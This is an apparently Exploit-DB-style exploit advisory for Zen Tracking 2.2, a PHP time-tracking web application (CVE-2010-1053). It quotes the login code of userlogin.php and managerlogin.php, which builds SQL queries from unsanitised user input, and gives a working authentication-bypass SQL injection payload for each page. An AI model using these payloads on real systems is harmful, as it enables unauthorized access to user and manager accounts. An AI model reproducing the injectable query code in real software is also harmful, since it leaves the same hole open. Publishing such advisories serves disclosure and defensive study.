[] NeoSense

Zen Tracking 2.2 - Authentication Bypass

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2010-02-06 
date_updated:  
verified: 1 
codes: OSVDB-63206;CVE-2010-1053;OSVDB-62169 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comzentimetracking.zip

[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/

[+] Vuln Code :

[userlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/userlogin.php

username: ' or' 1=1
Password: ' or' 1=1


[+] Vuln Code :

[managerlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/managerlogin.php

username: ' or' 1=1
Password: ' or' 1=1